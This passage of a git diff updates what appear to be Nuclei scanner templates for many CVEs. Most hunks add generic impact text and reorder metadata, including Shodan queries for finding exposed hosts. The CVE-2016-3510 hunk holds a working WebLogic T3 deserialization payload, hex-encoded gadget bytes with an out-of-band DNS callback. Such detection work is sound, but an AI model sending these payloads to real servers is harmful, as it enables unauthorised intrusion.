vulnerable at the endpoint that records user information when logging in to the administrator screen. It is possible to execute arbitrary SQL statements. Someone who wants to exploit the vulnerability must be log in to the administrator screen, even with low privileges. Any SQL statement can be executed. Doing so may leak information from the database. Version 13.8.0 contains a fix for this issue. As another mitigation, those who want to execute a SQL statement verbatim with user-enterable parameters should be sure to escape the parameter contents appropriately. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Upgrade to a patched version of Piwigo or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 95a26e8c2c..c7d3ffef52 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to an injection vector from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: This issue has been patched in XWiki 14.4.8, 14.10.4 and 15.0-rc-1. Users are advised to upgrade. reference: - https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29 diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index 5f92caf6b8..f04b0fb594 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS). reference: diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index d314d95df1..9c2fdc840d 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to the system, data leakage, or even complete compromise of the affected server. reference: - https://www.exploit-db.com/exploits/51598 - https://nvd.nist.gov/vuln/detail/CVE-2023-37629 @@ -15,8 +17,8 @@ info: cve-id: CVE-2023-37629 cwe-id: CWE-434 metadata: - max-request: 1 verified: true + max-request: 1 tags: cve,cve2023,fileupload,rce,opms,intrusive http: diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index 862b78fda7..8d8dfd2690 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0. + impact: | + This vulnerability can lead to unauthorized access to sensitive information stored on the server. remediation: | Upgrade to a patched version of MLflow to mitigate the Absolute Path Traversal vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 9bdd851be7..bf15c1db92 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the system. remediation: | Apply the latest security patches or updates provided by Ivanti to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index d07e06ee53..7351f9d593 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -6,6 +6,8 @@ info: severity: high description: | There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass access controls and gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Apply the necessary security patches or updates provided by Adobe to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index 4cd377a030..02098b42d9 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the device, potentially resulting in further compromise of the network. reference: - https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials - https://nvd.nist.gov/vuln/detail/CVE-2023-38433 @@ -17,10 +19,10 @@ info: cvss-score: 7.5 cwe-id: CWE-798 metadata: - max-req: 1 + verified: true max-request: 2 shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133' - verified: true + max-req: 1 tags: cve,cve2023,fujitsu,ip-series http: @@ -45,6 +47,7 @@ http: part: body words: - 'Field Support' + - type: status status: - 200 diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index fe6379c9e0..26ec8ee7e8 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade Metabase to version 0.46.6.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index da9a7514ac..5b2a90f346 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component. + impact: | + An attacker can view, modify, or delete sensitive files on the system, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FileMage Gateway. reference: diff --git a/http/cves/2023/CVE-2023-39120.yaml b/http/cves/2023/CVE-2023-39120.yaml index aa08469889..55c9bf6e9b 100644 --- a/http/cves/2023/CVE-2023-39120.yaml +++ b/http/cves/2023/CVE-2023-39120.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system. + impact: | + An attacker can exploit this vulnerability to view, modify, or delete sensitive files on the system, potentially leading to unauthorized access, data leakage, or system compromise. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-39120 diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index f3eb0f6d0a..e823ac3efd 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -6,6 +6,8 @@ info: severity: high description: | webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: | Upgrade to the latest version of Aria2 WebUI to fix the path traversal vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index fcebd250d2..13bdd0a7bf 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files. + impact: | + An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized disclosure of information or remote code execution. remediation: | Upgrade PaperCut to version 22.1.3 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index 8857a4662c..ad95e75168 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Blog2Social plugin (7.2.1) or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index ddd9e6365d..27d9d83e2e 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -6,17 +6,19 @@ info: severity: critical description: | Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. reference: - https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg - https://nvd.nist.gov/vuln/detail/CVE-2023-39361 classification: - cve-id: CVE-2023-39361 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2023-39361 cwe-id: CWE-89 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Login to Cacti" tags: cve,cve2023,cacti,sqli diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index c8053aa70f..f8c0e14cf3 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -6,14 +6,16 @@ info: severity: medium description: | Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. reference: - https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c - https://nvd.nist.gov/vuln/detail/CVE-2023-39598 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598 metadata: + verified: "true" max-request: 1 shodan-query: title:"icewarp" - verified: "true" tags: cve,cve2023,xss,icewarp http: diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index 69013a9270..8ae798836d 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. reference: - https://medium.com/@katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817 - https://nvd.nist.gov/vuln/detail/CVE-2023-39600 @@ -15,13 +17,13 @@ info: cve-id: CVE-2023-39600 cwe-id: CWE-79 epss-score: 0.0046 - cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* epss-percentile: 0.72232 + cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"icewarp" vendor: icewarp product: icewarp_server + shodan-query: title:"icewarp" tags: cve,cve2023,icewarp,xss http: diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index 750c89c505..9895223289 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -6,12 +6,14 @@ info: severity: medium description: | Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential theft of sensitive information, session hijacking, or defacement. reference: - https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/ metadata: + verified: "true" max-request: 1 shodan-query: html:"fieldpopupnewsletter" - verified: "true" tags: cve,cve2023,prestashop,xss http: diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index 901b769e1d..7f817bbf5e 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -6,13 +6,15 @@ info: severity: low description: | PrestaShop modules by MyPrestaModules expose PHPInfo + impact: | + An attacker can exploit this vulnerability to obtain sensitive information about the server configuration, potentially leading to further attacks. reference: - https://blog.sorcery.ie/posts/myprestamodules_phpinfo/ - https://cve.report/CVE-2023-39677 metadata: + verified: true max-request: 2 shodan-query: http.component:"PrestaShop" - verified: true tags: cve,cve2023,prestashop,phpinfo,disclosure http: diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index 045b97d614..96cca80061 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest patch or upgrade to a newer version of mooSocial to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 93703388d3..256ac3cb97 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of mooSocial or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index fe677be73f..1f70edddd8 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -5,6 +5,8 @@ info: author: iamnoooob,rootxharsh,pdresearch severity: critical description: Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. reference: - https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g - https://blog.calif.io/p/craftcms-rce @@ -19,10 +21,10 @@ info: epss-score: 0.00044 epss-percentile: 0.08209 metadata: - max-request: 1 verified: true - publicwww-query: "craftcms" + max-request: 1 shodan-query: http.favicon.hash:-47932290 + publicwww-query: "craftcms" tags: cve,cve2023,rce,unauth,craftcms http: diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index 6ab536c1cd..352be9f4fc 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -6,12 +6,14 @@ info: severity: high description: | JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`). + impact: | + The vulnerability allows an attacker to gain sensitive information from the JumpServer application. reference: - https://github.com/jumpserver/jumpserver/blob/v3.6.1/apps/terminal/api/session/session.py#L91 - https://nvd.nist.gov/vuln/detail/CVE-2023-42442 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="JumpServer" tags: cve,cve2023,jumpserver,exposure diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index bd01f96b1e..c2b7520923 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-4568 - https://www.tenable.com/security/research/tra-2023-31 diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 0ac4ef7924..2fb9906d01 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to local files. remediation: Fixed in version 3.09 reference: - https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/ diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index 2122d9fd39..79cfcd2d55 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -5,7 +5,9 @@ info: author: Farish severity: high description: | - A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely. + A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-4714 - https://www.exploitalert.com/view-details.html?id=39826 @@ -14,8 +16,8 @@ info: cvss-score: 7.5 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: cve,cve2023,playtube,exposure http: diff --git a/network/cves/2011/CVE-2011-2523.yaml b/network/cves/2011/CVE-2011-2523.yaml index a1c22ab8ce..eaecc8b8c0 100644 --- a/network/cves/2011/CVE-2011-2523.yaml +++ b/network/cves/2011/CVE-2011-2523.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the FTP server. remediation: | Update to the latest version of VSFTPD, which does not contain the backdoor. reference: diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml index fe810d10ef..7211249079 100644 --- a/network/cves/2015/CVE-2015-3306.yaml +++ b/network/cves/2015/CVE-2015-3306.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code with the privileges of the ProFTPd process. remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later. reference: - https://github.com/t0kx/exploit-CVE-2015-3306 diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml index cf73fce93f..e63814d001 100644 --- a/network/cves/2016/CVE-2016-2004.yaml +++ b/network/cves/2016/CVE-2016-2004.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x severity: critical description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account. remediation: | Upgrade to the most recent version of HP Data Protector. reference: diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index 6766b764df..89e693b6e6 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -6,36 +6,45 @@ info: severity: critical description: | Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586. - reference: - - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016. + reference: + - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-3510 cwe-id: CWE-119 - epss-score: 0.0162000000 + epss-score: 0.0162 metadata: - max-request: 2 verified: true + max-request: 2 tags: cve,cve2016,weblogic,t3,rce,oast,deserialization,network - variables: start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000" end: "fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078" - tcp: - inputs: - - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" - read: 1024 - - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}" + - data: "t3 12.2.1 + AS:255 + + HL:19 + + MS:10000000 + + PU:t3://us-l-breens:7001 + + \n" + read: 1024 + + - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}" host: - "{{Hostname}}" - "{{Host}}:7001" read-size: 4 - matchers: - type: word part: interactsh_protocol diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml index 1c75e515f5..84d6965bbd 100644 --- a/network/cves/2017/CVE-2017-3881.yaml +++ b/network/cves/2017/CVE-2017-3881.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access. reference: - https://github.com/artkond/cisco-rce diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml index 120bcc3720..f7a531a96e 100644 --- a/network/cves/2017/CVE-2017-5645.yaml +++ b/network/cves/2017/CVE-2017-5645.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. + impact: | + Successful exploitation of this vulnerability could allow remote attackers to execute arbitrary commands on the affected server. remediation: | Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups. reference: diff --git a/network/cves/2018/CVE-2018-2628.yaml b/network/cves/2018/CVE-2018-2628.yaml index a02bc3a0b0..2e5819dfca 100644 --- a/network/cves/2018/CVE-2018-2628.yaml +++ b/network/cves/2018/CVE-2018-2628.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contains an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + impact: | + Successful exploitation of this vulnerability can lead to arbitrary code execution with the privileges of the WebLogic server, potentially compromising the entire system. remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory reference: - https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml index 77cd966683..7381a48144 100644 --- a/network/cves/2018/CVE-2018-2893.yaml +++ b/network/cves/2018/CVE-2018-2893.yaml @@ -6,40 +6,51 @@ info: severity: critical description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 